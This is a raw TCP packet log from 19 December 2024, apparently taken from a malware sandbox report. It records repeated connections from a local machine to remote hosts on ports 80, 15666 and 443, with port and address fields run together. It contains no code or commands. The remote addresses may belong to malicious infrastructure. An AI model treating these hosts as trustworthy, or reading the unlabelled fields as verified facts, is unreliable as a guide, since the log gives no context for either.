                                                                                                  Dec 19, 2024 08:52:56.394342899 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.394393921 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.395199060 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.395328999 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.395370960 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.396147013 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.396261930 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.396306038 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.397140026 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.397217989 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.397301912 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.398109913 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.398224115 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.398271084 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.399061918 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.399193048 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.399240971 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.400027037 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.400141954 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.400192022 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.401047945 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.424915075 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.544575930 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.544629097 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.544703007 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.545160055 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.545242071 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.545283079 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.545943022 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.546041012 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.546084881 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.546900034 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.547033072 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.547075987 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.547883034 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.548085928 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.548130035 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.548851967 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.548957109 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.549000978 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.549814939 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.549947023 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.550015926 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.550760984 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.550879002 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.550925970 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.551750898 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.551852942 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.551901102 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.552705050 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.552809954 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.552856922 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.553666115 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.553775072 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.553822041 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.554632902 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.554761887 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.554848909 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.555635929 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.555749893 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.555820942 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.556672096 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.556760073 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.556801081 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.557566881 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.557702065 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.557748079 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.558507919 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.558649063 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.558691025 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.559626102 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.559700966 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.559743881 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.560445070 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.560590029 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.560631037 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.561440945 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.561620951 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.561671019 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.562438965 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.562551022 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.562594891 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.563350916 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.563488007 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.563530922 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.564310074 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.564420938 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.564471960 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.565299988 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.565473080 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.565525055 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.566272974 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.566354036 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.566392899 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.567224026 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.567334890 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.567378044 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.568217039 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.568326950 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.568368912 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.569190025 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.569286108 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.569328070 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.570138931 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.570235014 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.570296049 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.571124077 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.571239948 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.571290016 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.572074890 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.572179079 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.572220087 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.573066950 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.573174000 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.573216915 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.574008942 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.574084997 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.574125051 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.574959993 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.575059891 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.575102091 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.575905085 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.576025963 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.576076984 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.576884985 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.577003956 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.577047110 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.577841997 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.577971935 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.578017950 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.578824043 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.578975916 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.579015017 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.579811096 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.579916000 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.579957962 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.580790997 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.580888033 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.580929041 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.581732988 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.581856012 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.581899881 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.582690001 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.582817078 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.582861900 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.583686113 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.583831072 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.583875895 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.584640026 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.584752083 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.584806919 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.585597992 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.585741997 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.585783005 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.586544037 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.586656094 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.586699009 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.587547064 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.587619066 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.587665081 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.588500977 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.588613987 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.588658094 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.589466095 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.589576006 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.589617014 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.590424061 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.590533972 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.590605021 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.591422081 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.591813087 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.591860056 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.592514038 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.592583895 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.592628956 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.593337059 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.593483925 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.593533039 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.594302893 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.594428062 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.594484091 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.595257998 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.645190954 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.694984913 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.734627962 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.734746933 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.734791040 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.735049963 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.735142946 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.735186100 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.736037016 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.736145020 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.736187935 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.737020969 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.737149954 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.737193108 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.737929106 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.738054037 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.738101006 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.739082098 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.740168095 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.740226030 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.741919994 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.741935968 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.741951942 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.741976976 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.742074966 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.742114067 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.742249966 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.742413044 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.742465019 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.743328094 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.743344069 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.743393898 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.744147062 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.744299889 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.744343996 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.745126009 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.745285988 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.745336056 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.746093988 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.746275902 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.746350050 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.747200966 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.747216940 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.747256041 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.748069048 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.748089075 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.748131037 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.748620033 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.748729944 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.748774052 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.749553919 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.749675035 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.749732018 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.752964020 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.753026009 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.753071070 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.753210068 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.753226042 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.753242016 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.753257990 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.753276110 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.753303051 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.753971100 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.753977060 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.754040003 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.754987001 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.755168915 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.755219936 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.755999088 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.756019115 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.756084919 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.756782055 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.756968975 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.757019043 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.757776976 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.757791996 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.757838011 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.758577108 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.758742094 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.758794069 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.759740114 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.759763956 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.759805918 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.760608912 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.760768890 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.760811090 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.761624098 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.761651993 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.761698008 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.762536049 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.762691975 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.762732983 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.763505936 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.763674021 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.763765097 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.764467955 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.805505037 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.812681913 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:57.016746044 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:57.184884071 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:52:57.304510117 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:52:57.304615974 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:52:57.513073921 CET49710443192.168.2.5104.26.12.205
                                                                                                  Dec 19, 2024 08:52:57.513175011 CET44349710104.26.12.205192.168.2.5
                                                                                                  Dec 19, 2024 08:52:57.513600111 CET49710443192.168.2.5104.26.12.205
                                                                                                  Dec 19, 2024 08:52:57.545272112 CET49710443192.168.2.5104.26.12.205
                                                                                                  Dec 19, 2024 08:52:57.545356989 CET44349710104.26.12.205192.168.2.5
                                                                                                  Dec 19, 2024 08:52:58.760090113 CET44349710104.26.12.205192.168.2.5
                                                                                                  Dec 19, 2024 08:52:58.760179996 CET49710443192.168.2.5104.26.12.205
                                                                                                  Dec 19, 2024 08:52:58.984515905 CET49710443192.168.2.5104.26.12.205
                                                                                                  Dec 19, 2024 08:52:58.984592915 CET44349710104.26.12.205192.168.2.5
                                                                                                  Dec 19, 2024 08:52:58.984966040 CET44349710104.26.12.205192.168.2.5
                                                                                                  Dec 19, 2024 08:52:58.985039949 CET49710443192.168.2.5104.26.12.205
                                                                                                  Dec 19, 2024 08:52:58.986375093 CET49710443192.168.2.5104.26.12.205
                                                                                                  Dec 19, 2024 08:52:59.027333975 CET44349710104.26.12.205192.168.2.5
                                                                                                  Dec 19, 2024 08:52:59.310158968 CET44349710104.26.12.205192.168.2.5
                                                                                                  Dec 19, 2024 08:52:59.310234070 CET44349710104.26.12.205192.168.2.5
                                                                                                  Dec 19, 2024 08:52:59.310246944 CET49710443192.168.2.5104.26.12.205
                                                                                                  Dec 19, 2024 08:52:59.310286045 CET49710443192.168.2.5104.26.12.205
                                                                                                  Dec 19, 2024 08:52:59.316448927 CET49710443192.168.2.5104.26.12.205
                                                                                                  Dec 19, 2024 08:52:59.316482067 CET44349710104.26.12.205192.168.2.5
                                                                                                  Dec 19, 2024 08:53:04.832885027 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:04.952663898 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:04.952697039 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:04.952729940 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:04.952744007 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:04.952769995 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:04.952781916 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:04.952795982 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:04.952816963 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:04.952846050 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:04.952877998 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:04.952888012 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:04.952938080 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:04.952946901 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:04.952966928 CET1566649709193.3.19.151192.168.2.5
